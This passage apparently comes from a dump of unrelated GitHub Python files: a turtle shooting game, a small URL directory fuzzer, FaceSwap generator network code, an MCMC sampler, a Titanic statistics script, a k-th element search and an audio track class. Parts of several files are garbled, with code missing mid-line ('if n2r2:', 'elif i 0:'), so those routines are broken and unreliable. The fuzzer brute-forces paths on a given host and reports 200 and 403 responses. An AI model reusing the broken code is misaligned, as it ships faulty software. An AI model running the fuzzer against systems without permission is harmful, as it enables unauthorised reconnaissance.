math.sqrt(math.pow(p2.ycor()-p1.ycor(),2))\n if distance < 13:\n return 
True\n\n\n#Key controls for player 1\nwindow.listen()\nwindow.onkeypress(player_1_up, \"w\")\nwindow.onkeypress(player_1_down, \"s\")\nwindow.onkeypress(shoot_bullet, \"space\")\n\n#Key controls for player 2\nwindow.listen()\nwindow.onkeypress(player_2_up, \"Up\")\nwindow.onkeypress(player_2_down, \"Down\")\nwindow.onkeypress(shoot_bullet_2, \"p\")\n\nwhile True:\n window.update()\n #Player boundaries\n if player_1.ycor() > 248:\n player_1.goto(-350, 248)\n if player_1.ycor() < -248:\n player_1.goto(-350, -248)\n if player_2.ycor() > 248:\n player_2.goto(350, 248)\n if player_2.ycor() < -248:\n player_2.goto(350, -248)\n #Move the bullet for player 1\n x = bullet.xcor()\n x += bulletspeed\n bullet.setx(x)\n\n #Check to see if the bullet has gone off the boundary.\n if bullet.xcor() > 355:\n bullet.hideturtle()\n bulletcondition = \"ready to shoot\"\n if bullet_2.xcor() < -355:\n bullet_2.hideturtle()\n bullet_2condition = \"ready to shoot\"\n\n\n #Bullet 2\n p = bullet_2.xcor()\n p += bullet_2speed\n bullet_2.setx(p)\n\n\n\n if bulletCollision(bullet, player_2):\n #Reset the bullet\n bullet.hideturtle()\n bulletcondition = \"ready to shoot\"\n bullet.setposition(360,0)\n #Reset player 2\n player_2.setposition(350, 0)\n score_1 += 1\n score.clear()\n score.write(\"Player 1: {} Player 2: {}\".format(score_1, score_2), align = \"center\", font = (\"Impact\", 28, \"normal\"))\n \n\n if bulletCollision(bullet_2, player_1):\n #Reset the bullet\n bullet_2.hideturtle()\n bullet_2condition = \"ready to shoot\"\n bullet_2.setposition(-340,0)\n #Reset player 2\n player_1.setposition(-350, 0)\n score_2 += 1\n score.clear()\n score.write(\"Player 1: {} Player 2: {}\".format(score_1, score_2), align = \"center\", font = (\"Impact\", 28, \"normal\"))\n\n if score_1 == 10:\n player_1.hideturtle();\n player_2.hideturtle();\n window.listen()\n player_1.setposition(1000, 1000)\n player_2.setposition(1100 , 1000)\n win_1 = turtle.Turtle()\n win_1.speed(0)\n win_1.color(\"white\")\n win_1.penup()\n win_1.hideturtle()\n win_1.goto(0, 0)\n win_1.write(\"Player 1 is the winner\", align = \"center\", font = (\"Impact\", 28, \"normal\"))\n GG_1 = turtle.Turtle()\n GG_1.speed(0)\n GG_1.color(\"yellow\")\n GG_1.penup()\n GG_1.hideturtle()\n GG_1.goto(0, -175)\n GG_1.write(\"Good Game\", align = \"center\", font = (\"Impact\", 36, \"bold\"))\n \n\n if score_2 == 10:\n player_1.hideturtle();\n player_2.hideturtle();\n window.listen()\n player_1.setposition(1000, 1000)\n player_2.setposition(1100 , 1000)\n win_2 = turtle.Turtle()\n win_2.speed(0)\n win_2.color(\"white\")\n win_2.penup()\n win_2.hideturtle()\n win_2.goto(0, 0)\n win_2.write(\"Player 2 is the winner\", align = \"center\", font = (\"Impact\", 28, \"normal\"))\n GG_2 = turtle.Turtle()\n GG_2.speed(0)\n GG_2.color(\"green\")\n GG_2.penup()\n GG_2.hideturtle()\n GG_2.goto(0, -175)\n GG_2.write(\"Good Game\", align = \"center\", font = (\"Impact\", 36, \"bold\"))\n \n","repo_name":"Sukhpreet0927/my-attacking-two-player-game","sub_path":"Attacking game modified.py","file_name":"Attacking game modified.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23102307706","text":"import requests\nimport sys\n\nbanner = \"\"\"\n\nU U RRRR L FFFF \nU U R R L F \nU U RRRR L FFF u u zz zz eee rrr \nU U R R L F u u z z e e r \n UUU R RR LLLL F uuu zz zz ee r \n \n \n\"\"\"\n\ndef fuzzing(host, files):\n\ttry:\n\t\tf = open(files, \"r\", encoding=\"utf-8\")\n\n\t\tfor i 
in f:\n\t\t\tscan = host+i\n\t\t\tscan = scan.rstrip()\n\t\t\tscan += \"/\"\n\t\t\t\n\t\t\t# send requests to test resposne\n\t\t\tr = requests.get(scan)\n\t\t\tif r.status_code == 200:\n\t\t\t\tprint(\"Found 200 \", scan)\n\t\t\telif r.status_code == 403:\n\t\t\t\tprint(\"Forbidden 403 \", scan)\n\t\t\telse:\n\t\t\t\tpass\n\texcept KeyboardInterrupt:\n\t\t\tprint(\"Exit\")\n\nclass main():\n\tprint(banner)\n\tif len(sys.argv) != 3:\n\t\tprint(\"Usage : \", sys.argv[0], \" \")\n\t\tsys.exit()\n\telse:\n\t\tfuzzing(sys.argv[1], sys.argv[2])\n","repo_name":"DedSecCyber/URLFuzzer","sub_path":"urlfuzzer.py","file_name":"urlfuzzer.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19395743261","text":"import torch\nimport torch.nn as nn\nimport torchvision\nclass DeformConv(nn.Module):\n def __init__(self, input_channels, output_channels, kernel_size, stride=1, padding=0, bias=False, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.kernel_size = kernel_size if isinstance(kernel_size, tuple) else (kernel_size, kernel_size)\n self.stride = stride if isinstance(stride, tuple) else (stride, stride)\n self.padding = padding if isinstance(padding, tuple) else (padding, padding)\n self.bias = bias\n self.conv_offset = nn.Conv2d(input_channels, 2*self.kernel_size[0]*self.kernel_size[1], kernel_size=self.kernel_size, stride=self.stride, padding=self.padding, bias=bias)\n self.deform_conv = torchvision.ops.deform_conv.DeformConv2d(input_channels, output_channels, kernel_size=self.kernel_size, stride=self.stride, padding=self.padding, bias=bias)\n\n\n def forward(self, input):\n offsets = self.conv_offset(input)\n return self.deform_conv(input, offsets)\n\nclass InstanceNorm(nn.Module):\n def __init__(self, epsilon=1e-8):\n \"\"\"\n @notice: avoid in-place ops.\n https://discuss.pytorch.org/t/encounter-the-runtimeerror-one-of-the-variables-needed-for-gradient-computation-has-been-modified-by-an-inplace-operation/836/3\n \"\"\"\n super(InstanceNorm, self).__init__()\n self.epsilon = epsilon\n\n def forward(self, x):\n x = x - torch.mean(x, (2, 3), True)\n tmp = torch.mul(x, x) # or x ** 2\n tmp = torch.rsqrt(torch.mean(tmp, (2, 3), True) + self.epsilon)\n return x * tmp\n\nclass ApplyStyle(nn.Module):\n \"\"\"\n @ref: https://github.com/lernapparat/lernapparat/blob/master/style_gan/pytorch_style_gan.ipynb\n \"\"\"\n def __init__(self, latent_size, channels):\n super(ApplyStyle, self).__init__()\n self.linear = nn.Linear(latent_size, channels * 2)\n\n def forward(self, x, latent):\n style = self.linear(latent) # style => [batch_size, n_channels*2]\n shape = [-1, 2, x.size(1), 1, 1]\n style = style.view(shape) # [batch_size, 2, n_channels, ...]\n #x = x * (style[:, 0] + 1.) + style[:, 1]\n x = x * (style[:, 0] * 1 + 1.) 
+ style[:, 1] * 1\n return x\n\n\n\n\nclass Generator_Adain_Upsample(nn.Module):\n def __init__(self, input_nc, output_nc, latent_size, n_blocks=6, deep=False,\n norm_layer=nn.BatchNorm2d,\n padding_type='reflect'):\n \n super(Generator_Adain_Upsample, self).__init__()\n assert (n_blocks >= 0)\n activation = nn.ReLU(True)\n \n self.deep = deep\n \n self.first_layer = nn.Sequential(nn.ReflectionPad2d(3), nn.Conv2d(input_nc, 64, kernel_size=7, padding=0),\n norm_layer(64), activation)\n ### downsample\n self.down1 = nn.Sequential(nn.Conv2d(64, 128, kernel_size=3, stride=2, padding=1),\n norm_layer(128), activation)\n self.down2 = nn.Sequential(nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1),\n norm_layer(256), activation)\n self.down3 = nn.Sequential(nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1),\n norm_layer(512), activation)\n \n \n\n if self.deep:\n self.down4 = nn.Sequential(nn.Conv2d(512, 512, kernel_size=3, stride=2, padding=1),\n norm_layer(512), activation)\n\n ### resnet blocks\n BN = []\n for i in range(n_blocks):\n BN += [\n ResnetBlock_Adain(512, latent_size=latent_size, padding_type=padding_type, activation=activation)]\n self.BottleNeck = nn.Sequential(*BN)\n\n if self.deep:\n self.up4 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512), activation\n )\n self.up3 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(256), activation\n )\n self.up2 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(256, 128, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(128), activation\n )\n self.up1 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64), activation\n )\n\n self.last_layer = nn.Sequential(nn.ReflectionPad2d(3), nn.Conv2d(64, output_nc, kernel_size=7, padding=0))\n\n def forward(self, input, dlatents):\n x = input # 3*224*224\n\n skip1 = self.first_layer(x)\n skip2 = self.down1(skip1)\n skip3 = self.down2(skip2)\n if self.deep:\n skip4 = self.down3(skip3)\n x = self.down4(skip4)\n else:\n x = self.down3(skip3)\n bot = []\n bot.append(x)\n features = []\n for i in range(len(self.BottleNeck)):\n x = self.BottleNeck[i](x, dlatents)\n bot.append(x)\n\n if self.deep:\n x = self.up4(x)\n features.append(x)\n x = self.up3(x)\n features.append(x)\n x = self.up2(x)\n features.append(x)\n x = self.up1(x)\n features.append(x)\n x = self.last_layer(x)\n # x = (x + 1) / 2\n\n # return x, bot, features, dlatents\n return x\n\nclass ResnetBlock_Adain(nn.Module):\n def __init__(self, dim, latent_size, padding_type, activation=nn.ReLU(True)):\n super(ResnetBlock_Adain, self).__init__()\n\n p = 0\n conv1 = []\n if padding_type == 'reflect':\n conv1 += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv1 += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv1 += [nn.Conv2d(dim, dim, kernel_size=3, padding = p), InstanceNorm()]\n self.conv1 = nn.Sequential(*conv1)\n self.style1 = ApplyStyle(latent_size, dim)\n self.act1 = activation\n\n p = 0\n conv2 = []\n if padding_type == 'reflect':\n conv2 += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv2 += 
[nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv2 += [nn.Conv2d(dim, dim, kernel_size=3, padding=p), InstanceNorm()]\n self.conv2 = nn.Sequential(*conv2)\n self.style2 = ApplyStyle(latent_size, dim)\n\n\n def forward(self, x, dlatents_in_slice):\n y = self.conv1(x)\n y = self.style1(y, dlatents_in_slice)\n y = self.act1(y)\n y = self.conv2(y)\n y = self.style2(y, dlatents_in_slice)\n out = x + y\n return out\n\n\nclass AADBlock(nn.Module):\n def __init__(self,h_inchannel, z_inchannel, z_id_size=512) -> None:\n \n \"\"\"\n This block will not change the size of the input, but h_in.shape[-2:] must be equal to z_att.shape[-2:], and the output channels is h_inchannel\n z_inchannel is the number of channels of the input z_att\n \"\"\"\n \n super().__init__()\n self.norm = nn.InstanceNorm2d(h_inchannel)\n self.conv_f = nn.Conv2d(h_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.fc_1 = nn.Linear(z_id_size, h_inchannel)\n self.fc_2 = nn.Linear(z_id_size, h_inchannel)\n self.conv1 = nn.Conv2d(z_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(z_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.sigmoid = nn.Sigmoid()\n \n \n def forward(self,h_in, z_att, z_id):\n h_bar = self.norm(h_in)\n m = self.sigmoid(self.conv_f(h_bar))\n r_id = self.fc_1(z_id).unsqueeze(-1).unsqueeze(-1).expand_as(h_in)# [batch_size, h_inchannel, 1, 1]->[batch_size, h_inchannel, h, w]\n beta_id = self.fc_2(z_id).unsqueeze(-1).unsqueeze(-1).expand_as(h_in)\n i = r_id*h_bar + beta_id\n r_att = self.conv1(z_att)\n beta_att = self.conv2(z_att)\n a = r_att * h_bar + beta_att\n h_out = (1-m)*a + m*i\n return h_out\n \nclass AADResBlock(nn.Module):\n def __init__(self,h_inchannel, z_inchannel, latent_size=512) -> None:\n super().__init__()\n \n self.add1 = AADBlock(h_inchannel, z_inchannel, z_id_size=latent_size)\n self.act = nn.LeakyReLU(0.2,True)\n self.conv1 = nn.Conv2d(h_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.add2 = AADBlock(h_inchannel, z_inchannel, z_id_size=latent_size)\n self.conv2 = nn.Conv2d(h_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.norm = nn.InstanceNorm2d(h_inchannel)\n \n def forward(self, h_in, z_att, z_id):\n x1 = self.add1(h_in, z_att, z_id)\n x1 = self.act(x1)\n x1 = self.conv1(x1)\n x1 = self.norm(x1)\n x1 = self.add2(x1, z_att, z_id)\n x1 = self.act(x1)\n x1 = self.conv2(x1)\n return x1 + h_in\n \n \n# def make_layer(h_inchannel,z_inchannel,latent_size,init_AAD_layer=False):\n# if init_AAD_layer:\n# return AADResBlock(h_inchannel,z_inchannel,latent_size=latent_size)\n \nclass simplifiedGenerator(nn.Module):\n def __init__(self,input_layers = 5, output_layers= 5, latent_size=512, n_blocks=6,\n norm_layer=nn.InstanceNorm2d,deep=True,\n padding_type='reflect',init_channels=32,kernel_type=\"ordinary\") -> None:\n super().__init__()\n assert (n_blocks >= 0)\n # assert (input_layers <=5)\n self.deep = deep\n activation = nn.LeakyReLU(0.2,True)\n assert kernel_type in [\"ordinary\",\"deform\"]\n Conv = nn.Conv2d if kernel_type==\"ordinary\" else DeformConv\n \n self.n_iteration = n_blocks//(input_layers-2) if input_layers>2 else 0\n \n self.first_layer = nn.Sequential(nn.ReflectionPad2d(3), Conv(3, init_channels, kernel_size=7, padding=0),\n norm_layer(init_channels), activation)\n \n self.down = nn.ModuleDict()\n for i in range(3):\n self.down[f'layer_{i}'] = 
nn.Sequential(Conv(init_channels*(2**i), init_channels*(2**(i+1)), kernel_size=3, stride=2, padding=1),\n norm_layer(init_channels*(2**(i+1))), activation)\n if deep:\n self.down[f'layer_{3}'] = nn.Sequential(Conv(init_channels*(2**3), init_channels*(2**3), kernel_size=3, stride=2, padding=1),\n norm_layer(init_channels*(2**3)), activation)\n else:\n self.down[f'layer_{3}'] = nn.Identity()\n # 没有想好这块stride=1还是2\n for i in range(4,input_layers+1):\n self.down[f'layer_{i}'] = nn.Sequential(Conv(init_channels*(2**3), init_channels*(2**3), kernel_size=3, stride=1, padding=1),\n norm_layer(init_channels*(2**3)), activation)\n \n # BN = []\n # for i in range(n_blocks):\n # BN += [\n # ResnetBlock_Adain(256, latent_size=latent_size, padding_type=padding_type, activation=activation)]\n # self.BottleNeck = nn.Sequential(*BN)\n self.aads = nn.ModuleDict()\n for i in range(self.n_iteration*(input_layers-2)):\n #\n self.aads.add_module(f'layer_{i}',AADResBlock(init_channels*(2**3),init_channels*(2**3),latent_size=latent_size))\n \n \n self.up = nn.ModuleDict()\n # for i in range(4,output_layers):\n # self.up[f'layer_{i}'] = nn.Sequential(\n # # nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n # Conv(init_channels*(2**3),init_channels*(2**3) , kernel_size=3, stride=1, padding=1),\n # nn.InstanceNorm2d(init_channels*(2**3)), activation\n # )\n if deep:\n self.up[f'layer_{3}'] = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n Conv(init_channels*(2**3),init_channels*(2**3) , kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm2d(init_channels*(2**3)), activation\n )\n for i in range(3):\n self.up[f'layer_{i}'] = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n Conv(init_channels*(2**(i+1)), init_channels*(2**i), kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm2d(init_channels*(2**i)), activation\n )\n self.last_layer = nn.Sequential(nn.ReflectionPad2d(3), Conv(init_channels, 3, kernel_size=7, padding=0))\n self.input_layers = input_layers\n self.output_layers = output_layers\n def forward(self, x, latents):\n x = self.first_layer(x)\n x_attrs = []\n for i in range(len(self.down)):\n # deep会额外进行一次下采样,那么此时我应该拿\n \n x = self.down[f'layer_{i}'](x)\n if i>=self.input_layers-2 and i>=2+self.deep:\n x_attrs.append(x)\n # for i in range(len(self.BottleNeck)):\n # x = self.BottleNeck[i](x, latents)\n \n for i in range(self.n_iteration):\n for j in range(self.input_layers-2):\n x = self.aads[f'layer_{i*(self.input_layers-2)+j}'](x,x_attrs[i],latents)\n \n \n for i in reversed(range(4 if self.deep else 3)):\n x = self.up[f'layer_{i}'](x)\n x = self.last_layer(x)\n return x\n\n# model = AADBlock(512,256,512)\n# t = torch.randn(1,512,4,4)\n# x = torch.randn(1,256,4,4)\n# l = torch.randn(1,512)\n# print(model(t,x,l).shape)\n# model = simplifiedGenerator(5,5,512,6,deep=False)\n# t = torch.randn(1,3,224,224)\n# l = torch.randn(1,512)\n# print(model(t,l).shape)","repo_name":"TiAmoLip/FaceSwap","sub_path":"models/fs_networks_fix.py","file_name":"fs_networks_fix.py","file_ext":"py","file_size_in_byte":14429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25187958944","text":"#asynchronously plays a logo video while stuff loads\n\nimport thumbyGraphics\nfrom machine import Timer\n\ndata = open(\"/Games/PSdemo/logo.bin\", \"rb\")\nframecount = ord(data.read(1))\nframe = 0\n\ndef drawframe(dummy):\n global frame\n diff = 0\n pos = 0\n while True:\n step = 
ord(data.read(1))\n pos += step & 127\n if pos >= 360: break #end of screen buffer\n if step & 128: diff = ord(data.read(1))\n thumbyGraphics.display.display.buffer[pos] ^= diff\n frame += 1\n if frame >= framecount:\n frametimer.deinit()\n data.close()\n thumbyGraphics.display.update()\n\nframetimer = Timer()\n\ndef start():\n frametimer.init(freq=30, mode=Timer.PERIODIC, callback=drawframe)\n\ndef finish():\n while frame < framecount: pass\n","repo_name":"TinyCircuits/TinyCircuits-Thumby-Games","sub_path":"PSdemo/logo.py","file_name":"logo.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"52"} +{"seq_id":"71854580645","text":"\"\"\" Run one chain, can be imported by other files\nWe always sample S8, Om\n\"\"\"\n\nimport sys\n\nimport numpy as np\nfrom scipy.optimize import minimize\n\nimport emcee\n\nfrom loglike import LogLike\nfrom settings import S, IDENT\n\nnp.seterr(all='raise') # not sure why we did this originally, keep...\n\ndef logprior (theta) :\n S8, Om = theta\n in_interval = lambda x, t: t[0] <= x <= t[1]\n\n if not in_interval(Om, S['prior']['Om']) :\n return -np.inf\n\n # we have uniform prior in sigma8\n if 's8' in S['prior'] :\n s8 = S8 / np.sqrt(Om/0.3)\n if not in_interval(s8, S['prior']['s8']) :\n return -np.inf\n return -0.5 * np.log(Om)\n\n # we have uniform prior in S_8\n if not in_interval(S8, S['prior']['S8']) :\n return -np.inf\n\n return 0\n\n\ndef logprob (theta, loglike) :\n try :\n lp = logprior(theta)\n if not np.isfinite(lp) :\n return -np.inf\n return lp + loglike(theta)\n except FloatingPointError :\n return -np.inf\n\n\ndef nll (theta, loglike) :\n # this is the optimization objective when finding the starting point\n # NOTE that in this case theta may be either [S8, Om] or [s8, Om]\n t = theta.copy()\n if 's8' in S['prior'] :\n # need to transform to S8\n t[0] *= np.sqrt(t[1]/0.3)\n return -logprob(t, loglike)\n\n\ndef get_init_theta (loglike) :\n ml_theta_start = np.array([0.8, 0.3])\n ml_sln = minimize(nll, ml_theta_start, args=loglike,\n method='Powell',\n bounds=[ S['prior']['S8' if 'S8' in S['prior'] else 's8'], S['prior']['Om'] ])\n if not ml_sln.success :\n print(f'*** Warning: minimization not successful. 
{ml_sln.message}', file=sys.stderr)\n ml_theta = ml_theta_start\n else :\n ml_theta = ml_sln.x\n\n rng = np.random.default_rng()\n init_theta = ml_theta + rng.normal(0, 1e-2, size=(S['mcmc']['nwalkers'], 2))\n\n # make sure these are all inside the prior (if not we replace by uniform samples)\n lo, hi = [ [p[ii] for p in S['prior'].values()] for ii in range(2) ]\n for ii in range(S['mcmc']['nwalkers']) :\n # use nll here because it is already in terms of the correct amplitude which makes it convenient\n if not np.isfinite(nll(init_theta[ii], loglike)) :\n init_theta[ii, :] = rng.uniform(lo, hi)\n \n # now transform back to S8 if necessary\n if 's8' in S['prior'] :\n init_theta[:, 0] *= np.sqrt(init_theta[:, 1]/0.3)\n ml_theta[0] *= np.sqrt(ml_theta[1]/0.3)\n\n return init_theta, ml_theta\n\n\ndef Sample (obs_case, obs_idx) :\n\n ll = LogLike(obs_case, obs_idx)\n init_theta, ml_theta = get_init_theta(ll)\n assert all(np.isfinite(logprior(t)) for t in init_theta)\n\n # increase the stretch parameter from its default (2) to decrease acceptance rate and correlation time\n sampler = emcee.EnsembleSampler(S['mcmc']['nwalkers'], 2, logprob, args=(ll, ),\n moves=emcee.moves.StretchMove(a=5))\n sampler.run_mcmc(init_theta, (4 if obs_case=='real' else 1) * S['mcmc']['nsteps'], progress=(obs_case=='real'))\n\n kwargs = dict(thin=S['mcmc']['thin'], discard=S['mcmc']['discard'])\n chain = sampler.get_chain(**kwargs)\n lp = sampler.get_log_prob(**kwargs)\n\n try :\n autocorr_times = sampler.get_autocorr_time(discard=S['mcmc']['discard'])\n except emcee.autocorr.AutocorrError :\n autocorr_times = np.full(2, float('nan'))\n\n acceptance_rates = sampler.acceptance_fraction\n\n return dict(chain=chain, lp=lp, autocorr_times=autocorr_times, acceptance_rates=acceptance_rates,\n ml_theta=ml_theta, true_theta=ll.theta_real)\n","repo_name":"leanderthiele/HSC_Y1_kappapdf_production","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43679255493","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef main():\n df = pd.read_csv(\"dataset.csv\")\n survivedCount = 0\n\n survivedMale = 0\n survivedMaleAge = 0\n survivedMaleFare = 0\n\n survivedFemale = 0\n\n for index, row in df.iterrows():\n if row['Survived'] == 1:\n survivedCount += 1\n if row['Sex'] == \"male\":\n survivedMale += 1\n if row['Age'] >= 0:\n survivedMaleAge += row['Age']\n if row['Fare'] > 0:\n survivedMaleFare += row['Fare']\n else:\n survivedFemale += 1\n\n print(f\"There's a total of {survivedCount} people who survived the Titanic.\")\n print(f\"Of which, {survivedMale} are male and {survivedFemale} are female\")\n print(f\"Of the {survivedMale} males that survived, \"\n f\"The average age is {format(survivedMaleAge / survivedMale, '.2f')}, \"\n f\"The average fare is £{format(survivedMaleFare / survivedMale, '.2f')}\")\n\n activities = ['Male Survived', 'Female Survived', 'Died']\n deaths = 891 - (survivedMale + survivedFemale)\n slices = [survivedMale, survivedFemale, deaths]\n colors = ['r', 'g', 'b']\n plt.pie(slices, labels=activities, colors=colors,\n startangle=90, shadow=True, explode=(0.1, 0.1, 0.1),\n radius=1.2, autopct='%1.1f%%')\n\n plt.legend()\n plt.show()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"ahmedhamedaly/Titanic","sub_path":"TitanicStatistics.py","file_name":"TitanicStatistics.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29159047062","text":"def kthElement(arr1,arr2,n1,n2,k):\r\n if n2r2:\r\n high = cut1-1\r\n else:\r\n low = cut1 +1\r\n\r\n\r\n\r\narr1 = [100, 112, 256, 349, 770]\r\narr2 = [72, 86, 113, 119, 265, 445, 892]\r\nk = 6\r\nprint(kthElement(arr1,arr2,len(arr1),len(arr2),k))\r\n\r\n\r\n# def kthElement(arr1, arr2, k):\r\n\r\n# i = 0\r\n# j = 0\r\n# n1 = len(arr1)\r\n# n2 = len(arr2)\r\n# m1 = -1\r\n# for _ in range(k):\r\n# if iarr2[j]:\r\n# m1 = arr2[j]\r\n# j+=1\r\n# else:\r\n# m1 = arr1[i]\r\n# i+=1\r\n# elif i 0:\n mean = times[index - 1: index + 1].mean()\n if start <= mean:\n index -= 1\n start = index\n\n stop = None if length is None else start + length + 1\n\n times = times[start:stop]\n # initialize audio\n self._audio = Audio(audio,\n sample_rate=self._mix.sample_rate,\n num_channels=self._mix.num_channels,\n start=times[0],\n stop=times[-1],\n gain=volume,\n dtype=np.float_)\n self._disp = self._audio\n # store local times\n self._times = times - times[0]\n self._times.setflags(write=False)\n # initialize other attributes\n self._sample_indeces = round_(self.times * self.audio.sample_rate)\n self._sample_indeces.setflags(write=False)\n\n if automation is not None:\n automation = parse(automation)\n if 'Volume' in automation:\n volume = Volume(self)\n self._audio = volume(automation['Volume'])\n if 'Equalizer' in automation:\n equalizer = Equalizer(self)\n self._audio = equalizer(automation['Equalizer'])\n self._audio.setflags(write=False)\n if self.display_automation:\n self._disp = self._audio\n\n @property\n def initialized(self):\n \"\"\"True iff track has been initialized.\"\"\"\n return hasattr(self, '_audio')\n\n @property\n def audio(self):\n \"\"\"Reference to audio of the track.\"\"\"\n return self._audio\n\n @property\n def display(self):\n \"\"\"Samples to dispaly in the plot.\"\"\"\n if self._disp.num_channels > 1:\n self._disp = self._disp.remix(1)\n return self._disp\n\n @property\n def times(self):\n \"\"\"Reference to local beat positions.\"\"\"\n return self._times\n\n @property\n def sample_indeces(self):\n \"\"\"Reference to local beat sample indeces.\"\"\"\n return self._sample_indeces\n\n @property\n def position(self):\n \"\"\"Global position of the track.\"\"\"\n return self._position\n\n @property\n def num_segments(self):\n \"\"\"Number of segments the track encompasses.\"\"\"\n return self._times.size - 1\n\n @property\n def bpm(self):\n \"\"\"Average tempo in bpm.\"\"\"\n return time_to_bpm(np.diff(self._times).mean())\n\n def to_local(self, index):\n \"\"\"Convert global to local segment index.\"\"\"\n return index - self._position\n\n def to_global(self, index):\n \"\"\"Convert local to global segment index.\"\"\"\n return index + self._position\n\n def length(self, start, stop=None, local=True):\n \"\"\"Calculates the length of the specified segments in seconds.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n float\n The length of the specified segment range in seconds.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = 
self.to_local(start)\n stop = self.to_local(stop)\n return self._times[stop] - self._times[start]\n\n def num_samples(self, start, stop=None, local=True):\n \"\"\"Calculates the number of samples of the specified segments.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n int\n The number of samples of the specified segment range.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n return self._sample_indeces[stop] - self._sample_indeces[start]\n\n def available(self, start, stop=None, local=True):\n \"\"\"Checks if the specified segments are available.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n bool\n True iff all segments of the specified range are available.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n return self.initialized and 0 <= start and stop <= self.num_segments\n\n def segments(self, start, stop=None, local=True):\n \"\"\"Fetches the specified segments of the track.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n :class:`Audio`\n The audio to be played in the specified segment range.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n start_index = self._sample_indeces[start]\n stop_index = self._sample_indeces[stop]\n return self._audio[start_index:stop_index]\n","repo_name":"jakob-nagel/Adapta","sub_path":"adapta/model/data/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17248698154","text":"from random import choice, choices\nimport wx\n\nimport serial.tools.list_ports\nimport os\nfrom sys import platform\nimport re\n\nimport configdata\n\nfrom uiGlobals import IMG_ICON\n\nclass DutConfigDialog(wx.Frame):\n def __init__(self, top, dut):\n wx.Frame.__init__(self,None, size=(360,620))\n\n self.SetBackgroundColour(\"White\")\n self.SetTitle('DUT Config Dialog')\n self.dut = dut\n self.top = top\n\n self.dut_key = list(self.dut.keys())[0]\n self.dut_type = self.dut[self.dut_key][\"interface\"]\n self.dut_settings = self.dut[self.dut_key][self.dut_type]\n \n self.vboxParent = wx.BoxSizer(wx.VERTICAL)\n \n self.InitSelectionType()\n self.InitSerialConfig()\n self.InitTcpConfig()\n self.InitDataToWatch() \n \n self.vboxParent.AddMany([\n (self.vboxRead, 0, wx.EXPAND | wx.ALL, 10),\n (self.vboxSerial, 0, wx.EXPAND | wx.ALL, 10),\n (self.vboxTcp, 0, wx.EXPAND | wx.ALL, 10),\n (self.vboxLog, 0, wx.EXPAND | wx.ALL, 10)\n ])\n\n 